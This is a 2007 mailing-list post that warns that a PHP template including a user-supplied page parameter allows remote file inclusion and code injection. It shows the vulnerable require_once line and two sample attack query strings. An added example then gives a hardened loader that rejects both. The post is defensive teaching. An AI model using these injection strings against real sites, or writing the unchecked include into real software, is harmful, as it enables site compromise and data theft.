[thelist] PHP template code security sufficient?
Paul Bennett
Paul.Bennett at wcc.govt.nz
Tue May 15 17:04:15 CDT 2007
Consider this:
template.php?page=http://www.my-nasty-cross-site-scripting-site.net/i-want-to-steal-your-cookies
<div class="body">
<?php @ require_once ("$page.html"); ?>
</div>
Or
template.php?page=test.html");phpinfo();echo ("redherring
Which could become something like:
<?php @ require_once ("test.html");phpinfo();echo ("redherring"); ?>
/*
Require some file
Print out all the php and server info to the user
Echo some useless data
*/
Depending upon how robust your security checks are (the article has no mention of any), this has the potential for injecting outside content into your rendered source code, which may have XSS vulnerabilities, or allowing the user to control script execution (as in the last example).
Just my 2c,
Paul
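A hardened version of the template loader discussed in this message, as an added example that is not part of the original post or the article it refers to. The `pages` directory, the `home` default and the function name `resolve_page` are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). PAGE_DIR and the 'home'
// default page are assumptions made for illustration.
const PAGE_DIR = __DIR__ . '/pages';

/** Map a user-supplied page name to a file inside $baseDir, or return null. */
function resolve_page(string $requested, string $baseDir = PAGE_DIR): ?string
{
    // Strict character allowlist: no slashes, dots, colons or quotes, so
    // URLs (http://...), traversal (../) and stream wrappers cannot pass.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // Canonicalise both paths and confirm the file really sits inside the
    // base directory (guards against symlinks pointing elsewhere).
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.html');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly rather than relying on register_globals
// to create $page from the query string.
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
$file = resolve_page($page);

// Set the status before any output is sent.
if ($file === null) {
    http_response_code(404);
}

echo '<div class="body">';
if ($file === null) {
    echo 'Page not found.';
} else {
    // readfile() emits the file's bytes without executing them as PHP,
    // unlike require/include. No @ operator, so failures reach the logs.
    readfile($file);
}
echo '</div>';
```

With this loader, both request strings shown in the message fail the allowlist check and produce the 404 branch instead of reaching an include.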